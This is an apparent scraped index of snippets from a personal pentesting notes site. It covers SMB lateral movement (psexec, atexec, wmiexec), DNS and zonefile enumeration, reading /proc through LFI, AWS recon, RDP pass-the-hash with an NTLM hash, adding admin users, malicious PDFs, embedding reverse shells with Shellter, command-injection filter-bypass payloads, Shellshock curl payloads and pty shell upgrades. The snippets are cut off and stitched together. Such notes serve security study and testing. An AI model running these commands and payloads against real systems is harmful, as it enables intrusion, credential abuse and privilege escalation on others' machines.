With username/password With psexec (Prerequisites: ADMIN$ share is available, the user is part of the local administrator group on the target) With psexec via Metasploit use exploit/windows/smb/psexec With atexec (Impacket) atexec.py dom/user:pass@$target cmd.exe With wmiexec wmiexec.py domain.local/$target:$password@$ip With Smbmap smbmap -u ariley -p 'pass' -d WORKGROUP -x 'whoami' -H $target With Wmic (To run a…
Automates Windows enumeration. Github page Usage Seatbelt.exe -group=all Run Seatbelt.exe without arguments to see possible parameters. Example Seatbelt.exe OSInfo Processes Remote From another Windows system, seatbelt can connect to a victim and perform commands there. Seatbelt.exe LogonSessions -computername=$victim -username=bob -password=bobber Command aggregation There are already some groups defined which perform multiple tests at once. Seatbelt.exe -group=system [-computername=...]Seatbelt.exe…
Source on Github Creates screenshots from a list of URLs. Good way to get fast an overwiew over a new site. With nmap, use ‑oA file to save the output also as XML file. EyeWitness can use this file via ‑x file and make screenshots of all of this sites. EyeWitness.py --web -x webservers.xml
The usual order Network scan Detect hosts for a domain (use Seclist): for ip in $(cat common-subdomains.txt); do host $ip.megacorpone.com; done Reverse lookup: Find domains for addresses: for ip in $(seq 155 190); do host 50.7.67.$ip; done | grep -v "not found" Zonefile enumeration Grab zonefile from a random target domain: host -a -l fraunhofer.de ns3.fraunhofer.de…
Vulnerability Assessment Pentest Focus All vulnerabilities Only exploitable vulnerabilities Depth On the surface only On multiple layers (incl. pivoting) Risk Estimated Enables for better estimation due to combination of vulnerabilities
For reverse engineering Devicename Content /proc/$pid/maps Shows the mempory mapping of a process. Includes all used libraries. /proc/self/loginuid Own UID. Read processes If you can read /proc via a LFI: #!/bin/bash for i in {1..1024} do echo $i curl http://10.10.11.154/index.php\?page=/proc/$i/cmdline --output /tmp/proc/$i done The, look in the /tmp/proc directory for files > 0 byte. Read environment of…
Use profiles: See https://github.com/eon01/AWS-CheatSheet for many commands or https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-access-token/ General Get Infos of the current used profile aws [--profile $profile] sts get-caller-identity Another possibility to gain an ARN (with account id) is to call a non-existing function and to extract data from the error message. EC2 List all EC2 images = AMI’s: aws [--profile $profile] ec2…
The DPAPI is a Windows system which stored passwords bound to the local system. In the user directory there are the keys stored in the AppData\Roaming\Microsoft\Protect\<SID> directory. From the user’s password, a master key is derived. When the user changes his password, a new master key is generated as well — and all old master…
Try this ressources if you can access files, but not listing them. http://pwnwiki.io/#!presence/windows/blind.md Cheat sheet 1 List In Apache and probably more systems you can “travel over” non-existing files because the path is shortened before checking the existence of a file. Example: /test/test.txt/../../index.html will return in an Apache the root’s index.html even if the test direcory and…
This is how a PDF document looks — with a JavaScript execution. Note that with OpenAction 6 (object block 6) this block is executed when the document is opened. Other way to create a malicious PDF: Analyse a PDF file If a PDF file is compressed, decompress it first. pdftk input.pdf output output.pdf uncompress Get details with Pdfinfo…
Use rdesktop for a normal login rdesktop $target Normal login for a local user xfreerdp /cert-ignore /u:user /p:pass /v:$target Login for a domain user xfreerdp /cert-ignore /u:user /d:dom.com /p:pass /v:1$target To log in with a NTML hash, use xfreerdp. xfreerdp /u:Peter /pth:666fb5b812a486f87062670c3baf1852 /v:$target Activate net localgroup "Remote Desktop Users" Administrator /add Create a new admin and enable…
Shellter kann add a reverse shell payload into a exe file.
Configuration options env_reset: Resets the environment to default configured in /etc/environment. env_keep: Adds environment variables which are additionally allowed. If LD_PRELOAD is in there, see below. mail_badpass: Sends an email to the admin if a user failed to provide a sudo password. secure_path: Sets the PATH environment variable to the given paths. Configurations Something like the following…
This post contains a collection of variable substitution commands. Bash $(echo id) Ruby #{} PHP {}
See also the encoding post for encoding methods. Tips Bypassing filters Linux / PHP All URL encoded values starting with a space character. | id %20%7c%20%69%64 || id %20%7c%7c%20%69%64 & id %20%26%20%69%64 && id %20%26%26%20%69%64 <?php print "1"" ?> %20%3c%3f%70%68%70%20%70%72%69%6e%74%20%22%31%22%22%20%3f%3e ;id %20%3b%69%64 Sources
Show shares with smbclient: smbclient --no-pass -L //$targetsmbclient -U guest //$target/smbclient -U Administrator --pw-nt-hash $NTLMHASH \\\\$target\\directory Show shares with other clients: smbmap -R -H $target // No usersmbmap -u L4mpje -p 'bureaulampje' -d WORKGROUP -H $target -R // Usernmap -sV --script=smb-enum-shares -p445 $targetcrackmapexec smb $target -u '' -p '' --shares Vulnerability scan nmap --script=smb-vul* -p445 $target…
Enumeration Mandatory Optional Tools
Java Remote Method Invocation is a method to execute code remotely on other systems. This Oracle document describes it. But to use it, a program has to been uploaded first or it has to be known how to communicate with it. General A Java registry daemon has to be running. Run rmiregistry (bundled with Java) from…
Older bash versions may execute code after function definitions. Via command line Source with explanation export newfunction='() { echo 'shellshockdemo';}; echo vulnerable' Via a web server / CGI script Caution: Try the reverse shell example in Burp also if the curl command fails! curl http://$target/cgi-bin/admin.cgi -s > before curl -H "User-Agent: () { :; }; /bin/bash…
Shellshock A function in a environment variable is executed in a child process of the bash. When exporting a new function like this export func=’() { echo mist; }; echo aha;’ and starting a new bash session, “aha” is executed.
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';